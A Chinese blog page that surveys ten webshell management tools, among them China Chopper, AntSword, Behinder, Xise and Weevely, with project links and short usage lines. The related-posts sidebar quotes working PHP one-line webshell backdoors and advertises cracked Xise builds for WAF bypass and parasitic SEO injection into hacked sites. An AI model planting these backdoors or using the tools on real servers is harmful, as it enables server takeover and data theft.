xise php一句话木马,渗透利器 | 常见的WebShell管理工具

最新推荐文章于 2024-05-24 09:34:13 发布
最新推荐文章于 2024-05-24 09:34:13 发布
阅读量1.5k 收藏 3
点赞数
文章标签: xise php一句话木马

攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,然后再执行系统命令、权限提升、读取配置文件、窃取用户数据,篡改网站页面等操作。

本文介绍十款常用的Webshell管理工具,供你选择,你会选择哪一个?

1、中国菜刀(Chopper)

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE方式编译,支持多国语言输入显示。

6490aeddcc21b1e3335dd98c2e96d6cc.png

2、蚁剑(AntSword)

AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。

github项目地址:

https://github.com/AntSwordProject/antSword

acae796c10ab513105fe862b38bf9395.png

3、C刀(Cknife)

这是一款跨平台的基于配置文件的中国菜刀,把所有操作给予用户来定义。

github项目地址:

https://github.com/Chora10/Cknife

df4172e45fe73ff57b90fc7faea37447.png

4、冰蝎(Behinder)

冰蝎”是一款动态二进制加密网站管理客户端。

github项目地址:

https://github.com/rebeyond/Behinder

fef4a4ae03686c01ada17b451dbfc2d0.png

5、Xise

XISE WebShell管理工具。

ff7ba4c9a3239f58f2b544afc01c2a16.png

6、Altman

Altman3是一款渗透测试软件,基于.Net4.0开发,依托Eto.Form可以完美运行在Windows、Linux、Mac等多个平台。

github项目地址:

https://github.com/keepwn/Altman

625819ce608844be2465ef13a2560525.png

7、Weevely

Weevely是一种Python编写的webshell管理工具,跨平台,只支持PHP。

github项目地址:

https://github.com/epinna/weevely3

用法示例:

weevely generate weevely [cmd]

2ede6c212512e71faeb605a547dbfd8e.png

同时,在Kali 2.0 版本下,集成了三款Web后门工具:WebaCoo、weevely、PHP Meterpreter。

8、QuasiBot

QuasiBot是一款php编写的webshell管理工具,可以对webshell进行远程批量管理。

github项目地址:

https://github.com/Smaash/quasibot

d43cf82ebc2bb51f80973381bfcc7155.png

9、Webshell-Sniper

这是一款基于终端的webshell管理工具,仅支持在类Unix系统上运行。

github项目地址:

https://github.com/WangYihang/Webshell-Sniper

用法示例:

Usage :python webshell-sniper.py [URL] [METHOD] [AUTH]Example :python webshell-sniper.py http://127.0.0.1/c.php POST c

99bace78a8151f44a7cd9056d62dff6a.png

10、WebshellManager

一款用PHP+Mysql写的一句话WEB端管理工具,目前仅支持对PHP的一句话进行操作。

github项目地址:

https://github.com/boy-hack/WebshellManager

76314ca40f2f953f27c0bfb37f242d54.png

我在知识星球发起了一个小讨论,也收集到了一些webshell管理工具,如 hatchet、K8飞刀、lanker,欢迎补充。

21f45409a33f980cc7754be05cb0bc28.png

加入我的知识星球,获取更多安全干货。

李凜之
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
轩辕剑【超越XISE菜刀的shell管理工具
QQ2172688004的博客
10-17 1059
轩辕剑【超越XISE菜刀的shell管理工具】 这款shel管理工具,目前团队发了好几个月的时间了,下了很大的功夫,现在临近开发完毕了。进入最后最后阶段了,所以现在征求一些大家们的建议看还需要什么功能! 大家可以在评论下方说出来,我们都将进行关注参考!【包括可以建议重置软件的名称】 下面我就想给大家介绍一下轩辕剑 为什么要开发轩辕剑这款w...
最新WebShell管理工具增强版3.0
05-06
WebShell管理工具是一种在Web服务器上执行命令的实用程序,常用于远程管理和维护网站服务器。在IT领域,尤其是网络安全和服务器运维中,WebShell扮演着重要角色。"最新WebShell管理工具增强版3.0"显然是这个工具的...
php 木马 客户端,零魂PHP一句话木马客户端(一键提交版)
weixin_36040584的博客
03-11 214
类型:商务模板大小:5.0M语言:中文 评分:10.0标签:立即下载-----------------------------1.修补了下原始版本有些服务器不能正常运行的大Bug。2.去掉了提交后的登陆密码验证,提交后直接进入大马界面。-----------------------------更新说明:-----------------------------这玩意本来就是为了方便自己做的,所以本...
PHP反向shell:一款强大的渗透测试工具
最新发布
gitblog_00081的博客
05-24 367
PHP反向shell:一款强大的渗透测试工具 项目地址:https://gitcode.com/ivan-sincek/php-reverse-shell 项目介绍 PHP反向shell是一款基于PHP的轻量级渗透测试工具,它是pentestmonkey/php-reverse-shell的经典升级版,旨在为安全研究人员和IT专家提供一个跨平台的交互式远程控制选项。该项目由Ivan Sincek开...
Webshell一句话木马
qq_44040833的博客
02-09 1287
大马 webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也就是一种网页后门。黑客在入侵了一个网站后,很多人通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来访问该后门文件了,从而得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器...
php一句话获取webshell代码
a843538946的专栏
12-14 3384
<?php @eval($_POST['chopper']);?>
Web-一句话木马php
weixin_46685211的博客
05-05 5623
文章目录前言一、什么是webshell二、一句话木马1.基本原理2.上传文件到网站流程3.语句解析4.入侵条件参考 前言 在BUU CTF做到一道题,[ACTF2020 新生赛]Upload 1。要求upload,这个时候应该想到是一句话木马的题目。在攻防世界的web新手区中webshell也是一个一句话木马的题目。 一、什么是webshell webshellweb入侵的脚本攻击工具。webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网
201912-14最新web管理工具XISE.zip
12-14
超级XISE WBMS管理V13.0版本 •软件解压密码1999注意解压2次。 •生成内页修复生成内页内核,加速生成效率。 •生成内页支持新闻采集模式,可选本地新闻或远程新闻。 •生成内页支持防删功能。 •生成内页支持...
XISE WBMS管理 V8.86 破解版
02-26
新增一句话可过安全狗,使用时请将杀软关闭使用。 新概念网站后台远程多功能管理系统——XISE 网站后台管理系统 已支持PHP、ASP、ASPX、JSP四种语言 ,文章将持续更新。请关注开发进程。软件只供学习参考,如用于...
XISE WBMS管理V23.8版本最新官方认证无后门过狗过WAF版
03-11
3. **多功能集成**:XISE WBES管理V23.8加强多功能版表明该系统不仅仅是一个基础的管理工具,还集成了多种功能,如系统维护、日志分析、资源调度等,以满足不同用户的需求。 **二、核心功能** 1. **权限管理**:...
2017年XISE WBMS管理V12.0正式版
02-26
使用要点介绍: 1 批量上传时,请选择“自动选择”模式,全自动化一键所有shell全部上传。 把要上传的文件放入“\jiaoben\zhu”下的所有对应文件夹里,系统会根据shell类型传对应的脚本。 2 批量挂链,文件数量为...
xise寄生虫破解版
09-14
拿个压箱底的好东西来csdn混分,xise寄生虫3.5的破解版,网上真心不好找,测试全部功能可用 软件全部功能总结: 可视化操作,支持PHP、ASP、ASPX、JSP语言环境 多线程线程池操作,API编写,字节集读取,winhttpAPI访问,真正达到毫秒级反应 更适合新手使用,不仅有可视界面,并带有一键返回网站根目录,让你完全掌握自身方位 支持在4种语言的SHELL内自动生成内页 自动识别服务器编码,自动转码 更适合SEO,模板秒收录秒排名,模板标签功能齐全,能模仿所有SHELL页面 多站多任务模式 目录霸占,无法用其它工具打开 动态JS代码替换 采集还原覆盖劫持 更具有安全性,防脱壳、防注入后门、密码屏蔽、加密,大大增加了软件使用的安全性 支持SHELL收录量、BR、PR、快照时间多线程批量查询并保存 真正及时同步百度算法优化,只要百度算法更新,第二天软件就更新 支持多线程状态查询,查询正确率高达99% 支持批量多线程删除上传下载,弥补旧菜刀无法批量操作的遗憾 使用API查看超大文件,弥补了打开大文件时直接崩溃 一键写入脚本代码,快速清马 一键修改文件属性、时间、名称 一键随机写入或植入被控端并保存到数据库 一键多选复制目录的URL地址 超人性化设置,控件细节操作堪比大团队定制,win8界面,职业级清晰控件排版,新手上手直接变大神 超智能判断,设置键相比其他软件少了80%,功能却比其它软件强大10倍 智能的记录数据,急速百万条记录读取,百万级SHELL轻松管理 点击图片即可查看,无需下载 支持批量的导入与导出
IVBD『PHP菜刀html版开源』
11-11
IVBD工作室搜集网上资源及收费软件,授权于麒麟安全组旗下
渗透入侵\海洋顶端PHP注射工具.zip
07-15
海洋顶端PHP注射工具
php一句话webshell 服务端和客户端
05-11
php一句话webshell 服务端和客户端,一句话为 <?php $_GET[2]($_GET[0]($_GET[1]));?> 支持函数system,passthru,shell_exec 可以执行操作系统任意命令,windows linux unix 等。 zhaoxypass@yahoo.com.cn,欢迎下载使用,本软件为免费版。
常见WebShell管理工具
Daoke37的博客
03-23 614
常见WebShell管理工具 1.中国菜刀 2.蚁剑(AntSword) 3.C刀(Cknife) 4.冰蝎(Behinder) 5.Xise 6.Altman 7.Weevely 8.QuasiBot 9.Webshell-Sniper 10.WebshellManager
渗透测试】phpmyadmin一句话写入+socks代理渗透内网+CVE-2021-3493漏洞利用
serendipity1130的博客
09-02 919
OFF表示日志关闭C:\phpStudy\MySQL\data\stu1.log为日志绝对路径
xise ado oracle,xise菜刀30.0版本
weixin_33228847的博客
04-04 507
XISE WBMSV30.0整合更新功能如下:·生成内页修复生成内页内核,加速生成效率。·生成内页支持新闻采集模式,可选本地新闻或远程新闻。·生成内页支持防删功能。·生成内页支持批量操作,可数千shell不间断生成。·生成内页支持保存结果功能,结果保存为“\xise\备份\”。·生成内页强制跳出线程,批量生成时须设置,防止卡死。·批量上传文件支持自动化,可上传文件夹。·批量上传文件支持上传完后自...
【原创】利用动态二进制加密实现新型一句话木马之客户端篇
weixin_33729196的博客
05-24 306
概述 本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。 本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是: 利用动态二进制加密实现新型一句话木马之Java篇 利用动态二进制加密实现新型一句话木马之.NET篇 利用动态二进制加密实现新型...
usrp n210 fpga工程源码(已编译生成xise文件)part02
08-01
USRPN210是一种串行通用无线接收器/发射器外设,它具有可重新配置的现场可编程门阵列(FPGA),可以灵活自定义实现无线通信系统。 当我们说“USRPN210 FPGA工程源码(part02)”时,我们指的是该设备的FPGA部分的工程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值